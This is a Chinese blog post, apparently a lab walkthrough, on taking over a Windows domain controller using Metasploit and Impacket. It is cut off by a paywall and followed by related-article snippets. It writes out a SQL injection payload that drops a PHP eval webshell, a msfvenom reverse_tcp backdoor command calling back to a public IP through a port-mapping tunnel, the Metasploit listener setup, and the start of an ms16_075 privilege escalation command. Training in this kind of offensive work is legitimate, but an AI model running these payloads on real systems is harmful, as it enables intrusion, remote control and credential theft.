【Web安全】内网渗透研究之利用MSF和Impacket工具拿域控

最新推荐文章于 2025-05-29 13:04:39 发布
原创 最新推荐文章于 2025-05-29 13:04:39 发布 · 1.7k 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #网络安全 #计算机网络

本文详细介绍了如何利用Metasploit Framework(MSF)和Impacket工具在内网环境中进行渗透测试,最终获取域控制器的权限。首先,通过SQL注入获取Webshell,然后使用MSF进行提权和内网穿透。接着,利用Kiwi模块抓取密码并进行hash传递尝试。最后,通过Impacket的smbexec.py模块,利用NTLM hash成功登陆域控,实现域控的接管。整个过程展示了从信息收集到权限提升的一系列步骤。

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

查看资料

1、进去一看,典型的sql注入
在这里插入图片描述
2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

在这里插入图片描述
②蚁剑连接,发现权限很低
在这里插入图片描述

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么内网穿透,方法太多了)

kali内网穿透用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108
在这里插入图片描述
2、接着设置一下花生壳的配置在这里插入图片描述
3、可以看到我们映射到公网的ip和端口
在这里插入图片描述
4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

在这里插入图片描述
5、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp
或者使用
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 6666
run

在这里插入图片描述
6、执行webshell中的木马
在这里插入图片描述

sessions 1 //进入会话

7、发现无法不是最高权限,getsystem/getprivs并未成功
在这里插入图片描述
8、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令
在这里插入图片描述
②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=<
最低0.47元/天 解锁文章
红队内网攻防渗透内网渗透内网对抗:实战项目&VPC1打靶&PHP-RCE&三层代理路由&防火墙上线&密码喷射&提权
HACKONE的博客
02-22 767
上面已经抓取到了密码,但是我们通过拓扑分析看,要想上线win10只能通过正向shell,因为win7的防火墙是开的,win10反向主动连接肯定入站规则拦截,而win10自己没有开防火墙,所以win7主动正向连接就可以上线。win7开启了防火墙,入站规则肯定是会拦截我们的请求的,所以我们需要反向上线,让win7主动来连接我们。这里扫描发现是存在ms17010漏洞的,但是想上线192.168.2.142的话,我们没有路由是上线不了的,这里有两种办法:一种msf直接生成后门,另一种cs移植后门到msf
红队内网攻防渗透内网渗透内网对抗:横向移动篇&系统提权&NetLogon&ADCS&PAC&KDC&永恒之蓝&CVE漏洞
HACKONE的博客
06-24 822
当Windows系统的Active Directory证书服务(CS)在上运行时,由于机器账号中的dNSHostName属性不具有唯一性,中普通用户可以将其更改为高权限的机器账号属性,然后从Active Directory证书服务中获取机器账户的证书,导致中普通用户权限提升为管理员权限。set payload windows/x64/meterpreter/bind_tcp //正向连接上线。run post/multi/manage/autoroute //添加当前路由表。
内网渗透瑞士军刀-impacket工具解析(一)
失心少年
05-15 2042
impacket是一系列网络协议的python实现,实现包括IP、TCP、ICMP等基础的网络协议,更重要的是其实现了大量的Windows通信协议,包含Windows认证使用的ntlmkerberos协议、用于活动目录数据存储的ldap及大量的msrpc协议。
获取的方法
2301_76786857的博客
01-19 2269
渗透中、作为渗透测试人员,获取的权限基本上可以获取整个内网的权限
获取权限的方法
2301_76786857的博客
01-18 1707
对于入侵者来说,进入企业后,为了获取最大权限,通常会将目标瞄准在上。下面是针对不同的环境,列举的几种不同的攻击攻击手法。
内网渗透靶场(下)拿下 #zkaq
anlalu233的博客
09-17 2287
  内网往往有好多台服务器组成集群,为了方便管理,windwos系统可以通过批量管理;管理员直接操作的服务器称为制器,能操里面所有的节点,概念上类似于master;其余节点可通过master批量被操作,概念上类似于slave,俗称客户机;拿下制节点,就等于拿下了整个;   1、这里假设先拿下了一台客户机,远程桌面登陆,上传猕猴桃,先扫描内存,找到下面的administrator账号,: Authentication Id : 0 ; 381160 (00000000:0005d0e8)
内网渗透瑞士军刀-impacket工具解析(五)
失心少年
05-20 1230
psexec利用DCERPC命名管道巧妙地实现了Windows平台远程交互式shell,但是工具本身还是存在许多明显的特征。
WEB安全--内网渗透--利用Net-NTLMv2 Hash
m0_74800552的博客
04-07 2088
在前两篇文章中分析了NTLM协议中Net-NTLMv2 Hash的生成、如何捕获Net-NTLMv2 Hash,现在就来探讨一下在内网环境中,如何利用Net-NTLMv2 Hash进行渗透
内网渗透—横向移动&提权&漏洞横移
2301_76227305的博客
08-22 2546
Windows服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将内的普通用户权限提升到管理员权限等危害,具体的话自己查吧。
如何通过代码审计从三层内网各种漏洞拿到
kali_Ma的博客
07-16 924
目录代码审计 GetshellBypass 突破执行命令拿到宝塔后台权限拿到第一个 root.txt内网渗透内网横向移动-192.168.59.4内网渗透内网渗透-10.10.10.202CVE-2020-1472 拿到总结结尾 本次靶场要求: 四个 root.txt 分别在四台机子用户目录下 拿到三个及格 拿下四个满分 代码审计 Getshell 首先是一个站:cocat.cc 通过提示把它的备份文件下载到了本地进行审计: Bypass 突破执行命令 通过审计拿到了一个 webshell: .
手把手教你如何进行内网渗透
热门推荐
iO快到碗里来
11-19 9万+
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 0x01 信息收集 systeminfo 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞。 net start 查看启动进
攻防演练-实战 | 记一次对某企业的一次内网渗透总结
lza20001103的博客
08-28 1422
实战 | 记一次对某企业的一次内网渗透总结 文章目录实战 | 记一次对某企业的一次内网渗透总结0x01 外网打点到Getshell0x02 内网渗透0x03 横向渗透0x04 痕迹清理0x05 攻击结果0x06 总结 0x01 外网打点到Getshell 目标站点: 通过各种工具在线网站,对子名进行收集,并解析ip。发现主站存在CDN,使用fofa,搜索网站title、js等关键信息名解析的ip对应的C段,发现真实ip。对真实ip的ip段进行扫描,发现一台机器存在Weblogic中间件,使用exp
Impacket工具使用
qq_18811919的博客
02-22 5594
Impacket工具包使用
拿下后,我还是对前辈的操作念念不忘
Askshhbs的博客
04-15 486
历来攻防演练中,我都笃信一个道理——吃饱了才有力气干活。所以,在清晨的客户现场,当看到大佬满意地吃完了我带来的煎饺,我知道这一战,我们作为攻击队,基本已经拿下了。 未来的黑客大佬!我们终于找到你了~ 想要获取更多免费学习资料可搜索公众号:“掌安全课堂” 后台回复”我想学黑客“即可 虽然说的每一句话都带着一股醋味儿,但是大佬的含金量不容置疑——理智分析战况,果断找到目标,一切行云流水。 大佬告诉我们哪些站是好打的,哪些是不好打的。我们的任务是重点关注好打的站,找找OA、邮箱这些系统给他。随后,他顺手
Impacket工具集详解:内网渗透渗透)攻击神器
最新发布
vortex5的博客
05-29 2902
Impacket 是一个强大的 Python 工具集,专注于网络协议交互与 Windows 渗透,广泛应用于安全测试红队行动。它支持 SMB、Kerberos、NTLM 等协议,提供远程执行(如 psexec.py、wmiexec.py)、票据操作(GetTGT.py、ticketer.py)凭据提取(secretsdump.py)等功能。安装简便,通过 Python 运行,适用于多种操作系统。典型应用场景包括渗透、横向移动密码提取,其隐蔽性高,模块化设计便于定制攻击链。
Impacket网络协议工具包介绍
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-07 736
Impacket是一个Python类库,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。
横向移动工具-impacket-gui(一)
SuperherRo的博客
09-04 683
一款内网横向移动图形化工具
Impacket官方使用指南
weixin_30877755的博客
04-09 3090
什么是Impacket Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。 有关某些工具的说明,请访问:https:/...
渗透工具——kali中msf(后门生成模块msfvenom)
2301_78006725的博客
09-02 1105
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值